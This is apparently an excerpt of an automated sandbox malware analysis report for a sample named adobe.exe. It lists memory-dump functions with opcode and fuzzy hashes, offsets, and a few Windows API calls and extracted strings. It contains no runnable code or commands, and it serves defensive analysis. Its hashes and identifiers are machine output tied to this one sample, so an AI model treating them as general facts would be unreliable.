Opcode ID: 3f5075576c90196af629e05052c788ad2d6d8b03bc8a701101b5356264c55ed8
Instruction ID: eaec3ac637528b6ce826082357bc01cdcc1db66ff52c539480bc02afd02b8a64
Opcode Fuzzy Hash: 3f5075576c90196af629e05052c788ad2d6d8b03bc8a701101b5356264c55ed8
Instruction Fuzzy Hash: 6F118232B201249FDB549669D818AAF73FAEBC8211F11443AE40AE7344DE75DC0287D1

Function 06D6FB37 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81581f996fa53c60f055fc929a21a5a52a95e980e0ec602cf97e6845856d35af
Instruction ID: b28a56514b56f2c16e3419bf90003e3c9466a9800802eb89dcdb1c786493177a
Opcode Fuzzy Hash: 81581f996fa53c60f055fc929a21a5a52a95e980e0ec602cf97e6845856d35af
Instruction Fuzzy Hash: 6F11C875F115104BCF699BB9E45416DB7A3EBC4211B24887AE40AD7350EE34C842CB81

Function 06D63C30 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb0ad1703b7476e455a35c1640c67c236cba1371db75c6448c38de1aa6201f1
Instruction ID: e141695a274841ea44b9a62bf600f068b66c33cf7950855758f852152d83d670
Opcode Fuzzy Hash: bdb0ad1703b7476e455a35c1640c67c236cba1371db75c6448c38de1aa6201f1
Instruction Fuzzy Hash: 9221C2B1D01269AFCB10CF9AD984ACEFBF4FB48324F10812AE518A7350D374A554CFA5

Function 06D63F67 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b8ddbe8d19105b2f1c82a993cf356fa593c64342109ff05d1fb748d9bf18d4c
Instruction ID: 6d3160f4131929848feddfe38a8188b03466b9d20af0713dbaf81a2edeb084fa
Opcode Fuzzy Hash: 8b8ddbe8d19105b2f1c82a993cf356fa593c64342109ff05d1fb748d9bf18d4c
Instruction Fuzzy Hash: E601A732B200245FDB5496A9DC547EF73FADBC4610F04443AE409E3344EE69DC0647D5

Function 0129D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1887594273.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_129d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 45aebc967d627419c09fbf36d24881c04751cff3d3889f4e42d5e4d7e1b93223
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: BE11EB75504284CFCB12CF58C5C4B15BFA1FB84314F28C6AAD9094B252C33AD40ACB62

Function 06D63C38 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 800298e97bf93466b2edcf0e7fb168bd6ae7ce278a1188cac09580afee65bb14
Instruction ID: d70168f8f2251bf850c6c2473621cd8015cc9403534b830fb496c0b25155797b
Opcode Fuzzy Hash: 800298e97bf93466b2edcf0e7fb168bd6ae7ce278a1188cac09580afee65bb14
Instruction Fuzzy Hash: DA11D3B1D01229AFCB00CF9AD984ACEFBB4FB48310F10812AE518A7350C374A554CFA5

Function 06D641BB Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a93f87807ea96b6691ee5ab19f7aa97265a7d1d726c46d61b01b39fc7671295
Instruction ID: 63bf301b82396c428c1a0944fa3aec107f2857f3b32ce89f79482a1d79fadb79
Opcode Fuzzy Hash: 1a93f87807ea96b6691ee5ab19f7aa97265a7d1d726c46d61b01b39fc7671295
Instruction Fuzzy Hash: 6101AD35B100145BDBA596AFD95072BB7DADBC9710F24C83AF50AC7340DE25DC038396

Function 06D641C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3a175a08879b2c4e0475cac01204b632eb914b83c50692014af82821a43e30c
Instruction ID: a6706c5c12d6fac67ef7c986e43bbb1b01f253392882f79561425abfdaa23cf6
Opcode Fuzzy Hash: b3a175a08879b2c4e0475cac01204b632eb914b83c50692014af82821a43e30c
Instruction Fuzzy Hash: 0A016D31B100145BDBA596AED95072AB7DADBC9710F24C43AF50AC7344DE65DC434395

Function 06D6F128 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a783b29c48a9086720d807794760d4ba0b5e833eb925975be2e6feaf621b3885
Instruction ID: 66b699620f586e2b23f2a6b2352b86c5f63a06dfccf55df9adb64bb28e16f24d
Opcode Fuzzy Hash: a783b29c48a9086720d807794760d4ba0b5e833eb925975be2e6feaf621b3885
Instruction Fuzzy Hash: 17018CB1B204111BDB65976EE85472E67DBDBCA664F10883AF10EC7340DE69DC4343C5

Function 06D6A283 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d587f35b3ef6108d9b8f9dde93668315ef99503ef12c3d0eecc17a4dd66820f
Instruction ID: d5fba7424501edd2bb418ae9a10d10c771a7916bea3af20db2ae1095fff7efa0
Opcode Fuzzy Hash: 4d587f35b3ef6108d9b8f9dde93668315ef99503ef12c3d0eecc17a4dd66820f
Instruction Fuzzy Hash: 43018130B201155FDB60EAAFE45472AB7D6EB8E714F148839F50AE7344DE26EC428781

Function 06D6F127 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4ab7120a4b6aa420e11f97ebcfb3f393de52f30b69972b335c40610ab3f815
Instruction ID: d6e173a8168461e5d7bb71cb8d5879fe111cf42ead0a024f754b929bf95c3399
Opcode Fuzzy Hash: 6a4ab7120a4b6aa420e11f97ebcfb3f393de52f30b69972b335c40610ab3f815
Instruction Fuzzy Hash: 4901DCB1B204100BDB65D7AEE85072E63D7DBC9654F10883AF00ED7340DE69CC430381

Function 06D6A288 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3406a9ab1292e9af44c5efcd3bd7543ab6276094103e0daa20590ef556d93af2
Instruction ID: d13137f866bc2ca2cbd0ec9a2b5194ffba2b1c0c2ce04c0576b3dfff21836d3e
Opcode Fuzzy Hash: 3406a9ab1292e9af44c5efcd3bd7543ab6276094103e0daa20590ef556d93af2
Instruction Fuzzy Hash: E2018130B200155FDB60DAAFE45472AB3D6EB8D714F148839F50AE7344DE26EC428781

Function 06D6F11B Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9efdd05df39efa44060dc308eb9917392cc6677c05c139ca5281c347594005f
Instruction ID: b3d03821eb22afdac16d3bf5e4ceba2affa55209bc8b8f262648d35aaf374e48
Opcode Fuzzy Hash: e9efdd05df39efa44060dc308eb9917392cc6677c05c139ca5281c347594005f
Instruction Fuzzy Hash: 56F06D71B149004FDB62876EE86172A6BE7DBC9694F14847AF00EC7355DA69DC4383C1

Function 06D6C74F Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ea91e225b7cf66cf8e3315785573f91fc391b070ef9cde37a28340aade8296
Instruction ID: 8e89cde6e514629d4e68ac3ae18214a207932bbd436b30080ee4e884ff9e9b81
Opcode Fuzzy Hash: 45ea91e225b7cf66cf8e3315785573f91fc391b070ef9cde37a28340aade8296
Instruction Fuzzy Hash: E8F05C76F30228A7DF549AA6EC017DA7336FB40355F104426EA40F7344D7359C058BC0

Function 06D663EB Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99eb8dad64e01dea114a4cfb8f3ade2fc88e344f85800674f79b54ffcf255d61
Instruction ID: 8f86e7bfe3038c742b3c5b3ca2397ea306dbcd80b2a22b46ccc16faf5bd0080a
Opcode Fuzzy Hash: 99eb8dad64e01dea114a4cfb8f3ade2fc88e344f85800674f79b54ffcf255d61
Instruction Fuzzy Hash: 03E0C2B1E14148ABDF60CFB6C94576FB3ACD706214F2088B4F809DB201E2B6DA028352

Function 06D663F0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
Instruction ID: 6360f9b12800a991b64b0b4f09d14938832ce1d3ceb56d56b20f666ccf0c113e
Opcode Fuzzy Hash: 3bd82ae8ca65274fc3454b2c4d1ce8315d717affde06d8b7be6468b424b4745b
Instruction Fuzzy Hash: 95E0C2B0E14148ABDF60CFB6C94576FB3ACD706204F2084B4E409CB201E272DA028352

Non-executed Functions

Function 06D67618 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D67B09
$^q, xrefs: 06D67BBE
$^q, xrefs: 06D67789
$^q, xrefs: 06D67BB4
$^q, xrefs: 06D67B15
$^q, xrefs: 06D6774C
$^q, xrefs: 06D67BA8
$^q, xrefs: 06D6777D
$^q, xrefs: 06D67758
$^q, xrefs: 06D67BCA

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 51d4be279ee000e9b68b20a5f48b3de301834b70845fdf554b46ac6741bdda99
Instruction ID: 912fe39196f88d05e9e1163ebb8cff8cf002125418d0483cf29a7b9ec83a012f
Opcode Fuzzy Hash: 51d4be279ee000e9b68b20a5f48b3de301834b70845fdf554b46ac6741bdda99
Instruction Fuzzy Hash: 89121B30E002198FDB68DF69C954A9EB7F2FF88704F2085A9D50AAB355DB309D85CF91

Function 06D6A8A8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D6AA5A
$^q, xrefs: 06D6AA66
$^q, xrefs: 06D6A9AA
$^q, xrefs: 06D6AA05
$^q, xrefs: 06D6AA30
$^q, xrefs: 06D6A9F9
$^q, xrefs: 06D6A99E
$^q, xrefs: 06D6AA24

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 9916555dfea4497c9c9936b2c1c65ac0db0dbd32fbb74262239e36e17fa1fcbb
Instruction ID: 74cd7d52721821a4f91f0e8ff059343cc7e23094595ee34ab7f2b158a1e1f792
Opcode Fuzzy Hash: 9916555dfea4497c9c9936b2c1c65ac0db0dbd32fbb74262239e36e17fa1fcbb
Instruction Fuzzy Hash: 91915E30E102099FDB64DB6AD958B6EB7B2EF44304F18842AE482AB355DB75DC85CB90

Function 06D6AC40 Relevance: 10.2, Strings: 8, Instructions: 173COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D6AD6D
$^q, xrefs: 06D6ADC0
$^q, xrefs: 06D6AE0C
$^q, xrefs: 06D6ADB4
$^q, xrefs: 06D6AD61
$^q, xrefs: 06D6AE18
$^q, xrefs: 06D6ADEF
$^q, xrefs: 06D6ADE3

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: a73f6514b4ea4025f6877ae48eb2894fd8f7e1e64bcfdcd0570b0b0e43286bd4
Instruction ID: a6ffcde9d3764b5685c6801dab0fa7da26c5a22d61b3929dde2750d8d9bfe3ee
Opcode Fuzzy Hash: a73f6514b4ea4025f6877ae48eb2894fd8f7e1e64bcfdcd0570b0b0e43286bd4
Instruction Fuzzy Hash: 4E518030F102088FDB69DB6AD94466EB7F2EB84300F24892AE446EB355DF35DC46CB91

Function 06D67018 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D67360
.5vq, xrefs: 06D67073
$^q, xrefs: 06D67354
$^q, xrefs: 06D674B4
$^q, xrefs: 06D672FA
$^q, xrefs: 06D6752C
$^q, xrefs: 06D67520

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 6cffe251c806474551ee4fad10a6c992fc5b54cadd448f69a91f2431abc6a569
Instruction ID: 008bf9e23e989a5d79ea9cac86984553cf6ce52eeeb5cfdc47649240062cbdff
Opcode Fuzzy Hash: 6cffe251c806474551ee4fad10a6c992fc5b54cadd448f69a91f2431abc6a569
Instruction Fuzzy Hash: 13F15E30B01209CFDB58DBA9D594A6EB7B3FF84304F248569E4059B369DB75DC82CB90

Function 06D6B978 Relevance: 7.7, Strings: 6, Instructions: 197COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D6BB2B
$^q, xrefs: 06D6BB1F
$^q, xrefs: 06D6BB53
$^q, xrefs: 06D6BAF7
$^q, xrefs: 06D6BAEB
$^q, xrefs: 06D6BB5F

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 5deef69cf76711510166b234646b02c823e0696e658f6c97c30d652c42d3c571
Instruction ID: b5ff2c1fddd84346264cecda1c8fafdb32d10ee6981faf7f2391a6e9b7ce4276
Opcode Fuzzy Hash: 5deef69cf76711510166b234646b02c823e0696e658f6c97c30d652c42d3c571
Instruction Fuzzy Hash: 2071AE30E102198FDB68DFAAD59466EB7B2FF84300F10896AE006DB358DB71DD56CB81

Function 06D68350 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D685AA
$^q, xrefs: 06D6861B
$^q, xrefs: 06D6860F
$^q, xrefs: 06D685B6

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 191bb3e8aa1482501d4e9d189148e15cb5d110bb14e89d10c287cbf7d49a1316
Instruction ID: df585e9e11f3b32fd5bdb7678de220300eefcd02c48dbf63fc34cd395cc6f6b4
Opcode Fuzzy Hash: 191bb3e8aa1482501d4e9d189148e15cb5d110bb14e89d10c287cbf7d49a1316
Instruction Fuzzy Hash: 08B14D30F112098FDB54EFA9D5946AEB7B2FF88304F248429E0069B359DB75DC86CB90

Function 06D68768 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D687E7
LR^q, xrefs: 06D6885B
$^q, xrefs: 06D687F3
LR^q, xrefs: 06D688AA

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 1b21d540eb5e365d723991fa496f0d9b452ccc5ceff79b03954c6ff69b01f68f
Instruction ID: f1bfb356104b673acc12ca207cf19347d97ab10a0d8cb9b7d1ee66eb7abfae7a
Opcode Fuzzy Hash: 1b21d540eb5e365d723991fa496f0d9b452ccc5ceff79b03954c6ff69b01f68f
Instruction Fuzzy Hash: A751D330F102019FDB58DB6AD944A6AB7F2FF88704F108569E4059B3A5DB34EC45CBA1

Function 06D6AC3B Relevance: 5.2, Strings: 4, Instructions: 157COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D6ADB4
$^q, xrefs: 06D6AE0C
$^q, xrefs: 06D6AD61
$^q, xrefs: 06D6ADE3

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: da13eda605a1417487f5e8f8f571c8f67efdc986ee87117cbc0e0e1bfe66bea2
Instruction ID: 13719f9c27205e9353bf49d185fbb5d7cc5e31811bfd444b3918cb8f663d22de
Opcode Fuzzy Hash: da13eda605a1417487f5e8f8f571c8f67efdc986ee87117cbc0e0e1bfe66bea2
Instruction Fuzzy Hash: E8517F34F102049FDBA5DB69D5846AEB3B2EB84311F18852AE846EB355DB35DC42CB90

Analysis Process: adobe.exePID: 7292, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	38
Total number of Limit Nodes:	5

Executed Functions

Function 02C0B0E8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02C0B33E

Strings

p@;, xrefs: 02C0B2F7

Memory Dump Source

Source File: 00000009.00000002.1889166863.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2c00000_adobe.jbxd

Similarity

API ID: HandleModule
String ID: p@;
API String ID: 4139908857-2970247504
Opcode ID: 1f379d20d1a80afcdc5c41bd4b28ea7ff71c530213d2acf0ba1d90abb488708f
Instruction ID: 4b64c91ea814a85bba189d8dfb8b025683c6028f1d70a6f45b5283a827a66c2b
Opcode Fuzzy Hash: 1f379d20d1a80afcdc5c41bd4b28ea7ff71c530213d2acf0ba1d90abb488708f
Instruction Fuzzy Hash: 92714470A00B058FDB24DF69D58175ABBF2FF88308F148A2DD48AD7A90DB74E945CB90

Function 02C0590D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02C059C9

Strings

p@;, xrefs: 02C0594C

Memory Dump Source

Source File: 00000009.00000002.1889166863.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2c00000_adobe.jbxd

Similarity

API ID: Create
String ID: p@;
API String ID: 2289755597-2970247504
Opcode ID: a14ee2de651d9aa944cb178348d9d55eec3d0ce870d96acf59750ddbf5602878
Instruction ID: 434d521af5d3389d90fa13431e79cd382fb9e058bd20247ad694810284d38959
Opcode Fuzzy Hash: a14ee2de651d9aa944cb178348d9d55eec3d0ce870d96acf59750ddbf5602878
Instruction Fuzzy Hash: 3C41F5B0C00619CFDB14CFA9C9847DDFBB5BF48304F24816AD409AB255DB75594ACF90

Function 02C04248 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02C059C9

Strings

p@;, xrefs: 02C0594C

Memory Dump Source

Source File: 00000009.00000002.1889166863.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2c00000_adobe.jbxd

Similarity

API ID: Create
String ID: p@;
API String ID: 2289755597-2970247504
Opcode ID: a90d636014e6865a87263bbc8af615a336a44aae3a39475fb64a92961032d6c9
Instruction ID: 539c38e8eea4a3d8935944ace085fc7e5f20c56ba635f30f83e1670edbe901f8
Opcode Fuzzy Hash: a90d636014e6865a87263bbc8af615a336a44aae3a39475fb64a92961032d6c9
Instruction Fuzzy Hash: E241D2B0C00719CBDB24DFAAC98479EBBB5BF48304F64806AD408AB295DB755946CF90

Function 02C0AFD4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C0D58E,?,?,?,?,?), ref: 02C0D64F

Strings

p@;, xrefs: 02C0D5E7

Memory Dump Source

Source File: 00000009.00000002.1889166863.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2c00000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID: p@;
API String ID: 3793708945-2970247504
Opcode ID: 65c3a502448ba2df96f89cfc6b0ec6e846f97b2abde0fa6a85d15e6fdbc2e747
Instruction ID: 773b78f17a3f7c74994dee62b45ef62d774f390266a087730c4e9cb404a70413
Opcode Fuzzy Hash: 65c3a502448ba2df96f89cfc6b0ec6e846f97b2abde0fa6a85d15e6fdbc2e747
Instruction Fuzzy Hash: 1021E4B5900208EFDB10CF9AD584ADEFFF8EB48314F14841AE919A7350D378A950CFA5

Function 02C0D5C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C0D58E,?,?,?,?,?), ref: 02C0D64F

Strings

p@;, xrefs: 02C0D5E7

Memory Dump Source

Source File: 00000009.00000002.1889166863.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2c00000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID: p@;
API String ID: 3793708945-2970247504
Opcode ID: 3202e8af6428e1fb72f03e1b99ffcb91c90fc52953aa647c55d1984e631c6222
Instruction ID: 7378b6f84147ee9125203a63c31799499f2f08cd03c706a6d4d49dbd08274a0a
Opcode Fuzzy Hash: 3202e8af6428e1fb72f03e1b99ffcb91c90fc52953aa647c55d1984e631c6222
Instruction Fuzzy Hash: CC21EFB59002589FDB10CFA9D584AEEBBF4FB48324F14842AE958A3351D378A940CFA5

Function 02C0B2D8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02C0B33E

Strings

p@;, xrefs: 02C0B2F7

Memory Dump Source

Source File: 00000009.00000002.1889166863.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2c00000_adobe.jbxd

Similarity

API ID: HandleModule
String ID: p@;
API String ID: 4139908857-2970247504
Opcode ID: 295e55143c4add4f451563d7c753e330e4de92a622b0a73701a812cea5fe7678
Instruction ID: d9ff6e6621812973babd83da210cb0e0d8fc161797049f95b2e137db863eb5fb
Opcode Fuzzy Hash: 295e55143c4add4f451563d7c753e330e4de92a622b0a73701a812cea5fe7678
Instruction Fuzzy Hash: 121110B6D002498FCB14CF9AD544ADEFBF4AB88328F20842AD519A7250C379A945CFA5

Function 00FCD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1887742805.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fcd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc086886811270478da30abca5f29d735f019605f66d6edd988afed9b59a963
Instruction ID: 7cba3408116bbc5af9e1fdf2f110d2035d780ef9131988ef8e17b6f7d83842eb
Opcode Fuzzy Hash: 2cc086886811270478da30abca5f29d735f019605f66d6edd988afed9b59a963
Instruction Fuzzy Hash: 21212872500205DFDB09DF14DAC1F2ABF65FB94324F20C17DDA094B256C336E856E6A2

Function 00FDD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1887824035.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fdd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bfd78dd97888243996c0768bcd1eb321d9da99813b520a7833580b5c899e068
Instruction ID: e517475a12d87cf13953d2a609d75d070ad05918519d1d4867678dca80912f85
Opcode Fuzzy Hash: 1bfd78dd97888243996c0768bcd1eb321d9da99813b520a7833580b5c899e068
Instruction Fuzzy Hash: 1E21F571504200DFCB14DF14D988B16BB66EBC4324F28C56AD80A4B35AC336D847DA61

Function 00FDD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1887824035.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fdd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d317d79e5f8f45398a8f228dfe8c51ec59cf093726417a6b7945f3edb88ecb9
Instruction ID: 6f1467f951a013eb91d40d00d847a047739b6a619c3d09015ec8bfa9cc97d5d6
Opcode Fuzzy Hash: 3d317d79e5f8f45398a8f228dfe8c51ec59cf093726417a6b7945f3edb88ecb9
